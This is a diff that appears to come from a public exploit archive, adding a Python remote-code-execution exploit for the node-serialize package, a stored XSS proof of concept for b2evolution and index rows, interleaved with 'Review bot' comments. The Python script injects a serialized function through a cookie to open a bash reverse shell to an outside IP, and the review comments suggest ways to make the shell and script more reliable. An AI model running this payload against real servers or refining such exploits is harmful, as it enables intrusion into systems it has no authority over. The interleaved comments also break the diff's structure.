diff --git a/exploits/nodejs/webapps/49552.py b/exploits/nodejs/webapps/49552.py
new file mode 100755
index 000000000..aa6d3d82c
--- /dev/null
+++ b/exploits/nodejs/webapps/49552.py
@@ -0,0 +1,36 @@
+# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
+# Exploit Author: UndeadLarva
+# Software Link: https://www.npmjs.com/package/node-serialize
+# Version: 0.0.4
+# CVE: CVE-2017-5941
+
+import requests
+import re
+import base64
+import sys
+
+url = 'http://192.168.100.133:8000/' # change this
+
+payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
+"return function () {"
+"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
+"console.log('still inside');"
+"const { exec } = require('child_process');"
+"exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1');" # change this
+"}"
+"})(require('http').ServerResponse.prototype.end)")
+
+# rce = "_$$ND_FUNC$$_process.exit(0)"
+# code ="_$$ND_FUNC$$_console.log('behind you')"
+code = "_$$ND_FUNC$$_" + payload
+
+string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
+
+cookie = {'profile':base64.b64encode(string)}
+
+try:
+ response = requests.get(url, cookies=cookie).text
+ print response
+except requests.exceptions.RequestException as e:
+ print('Oops!')
+ sys.exit(1)
\ No newline at end of file
diff --git a/exploits/php/webapps/49551.txt b/exploits/php/webapps/49551.txt
new file mode 100644
index 000000000..0efc0fa81
--- /dev/null
+++ b/exploits/php/webapps/49551.txt
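Review bot: The script is Python 2 only — `print response` is a statement and `base64.b64encode(string)` is handed a `str` — yet nothing declares that, so under a default `python3` it fails before any request is sent; either add `#!/usr/bin/env python2` at the top or port the two lines to `print(response)` and `cookie = {'profile': base64.b64encode(string.encode()).decode()}`, and drop the unused `import re`. The original `end` captured by the IIFE is never invoked by the replacement function, so once the payload fires the server never finishes the response and `requests.get(url, cookies=cookie)` blocks indefinitely; pass a bound such as `requests.get(url, cookies=cookie, timeout=10)` and note that the resulting `Timeout` (a `RequestException`) is the expected outcome of a successful trigger rather than an `'Oops!'` failure. `child_process.exec` runs its command through `/bin/sh`; on distributions where that is dash the `>&` redirection to `/dev/tcp/...` is rejected as a bad fd number, so `exec('bash -c "bash -i >& /dev/tcp/192.168.200.5/445 0>&1"')` is the more portable form. The target URL and listener address are hard-coded behind `# change this` markers; reading them from `sys.argv` (already imported) would remove that editing step.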
@@ -0,0 +1,18 @@
+# Exploit Title: b2evolution 6.11.6 - 'plugin name' Stored XSS
+# Date: 09/02/2021
+# Exploit Author: Soham Bakore, Nakul Ratti
+# Vendor Homepage: https://b2evolution.net/
+# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
+# Version: 6.11.6
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+# CVE : CVE-2020-22841
+
+
+--------------------------Proof of Concept-----------------------
+
+1. Login with an account having high privileges
+2. Navigate to System -> Plugins and select any plugin
+3. Change the plugin name and enter the following payload  "> in the name parameter
+4. Payload gets stored in the database
+5. The payload gets executed after the victim checks the plugin page.
+6. This vulnerability needs high privilege and can affect other users with similar privileges
\ No newline at end of file
diff --git a/exploits/windows/local/49530.txt b/exploits/windows/local/49530.txt
index f24bc91e1..920b7430f 100644
--- a/exploits/windows/local/49530.txt
+++ b/exploits/windows/local/49530.txt
@@ -6,6 +6,7 @@
 # Software Link: https://download.millewin.it/files/Millewin/setup/InstMille_Demo_13.39_2019PS.exe
 # Version: 13.39.028 – 146.1.9
 # Tested on: Microsoft Windows 10 Enterprise x64
+# CVE: CVE-2021-3394
 
 Millennium Millewin also known as "Cartella clinica"
 
diff --git a/files_exploits.csv b/files_exploits.csv
index 637808d56..31e8df392 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
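Review bot: The payload in step 3 is incomplete — the line reads `enter the following payload  "> in the name parameter`, so whatever tag followed the attribute-closing `">` has been lost (most likely stripped as markup), and a reader cannot reproduce the stored XSS from this file alone. Restore the full payload string, quoted or otherwise protected so it survives rendering, and state where the unescaped name is emitted (the Plugins list step 5 refers to) so the sink is explicit. `# Date: 09/02/2021` is ambiguous between 9 February and 2 September; the ISO form the index uses (`2021-02-09`) avoids that, and `# Tested on:` names browsers only, so the server platform/PHP version the issue was confirmed on is worth adding.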
@@ -43740,3 +43740,5 @@ id,file,description,date,author,type,platform,port
 49545,exploits/php/webapps/49545.txt,"WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion",2021-02-08,"Erik David Martin",webapps,php,
 49546,exploits/php/webapps/49546.txt,"Online Car Rental System 1.0 - Stored Cross Site Scripting",2021-02-09,"Naved Shaikh",webapps,php,
 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
+49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
+49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,
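Review bot: The new 49551 row credits only `"Soham Bakore"` while the indexed file's header lists `Soham Bakore, Nakul Ratti`; the author column should match the file, i.e. `"Soham Bakore, Nakul Ratti"`, or the file should be trimmed to one name, so attribution is consistent between index and entry. The 49552 description carries no version although the script header declares `Version: 0.0.4`; neighbouring rows put the affected version in the description, so `"Node.JS - 'node-serialize' 0.0.4 Remote Code Execution (2)"` would follow the index's pattern and make version-based searches find it.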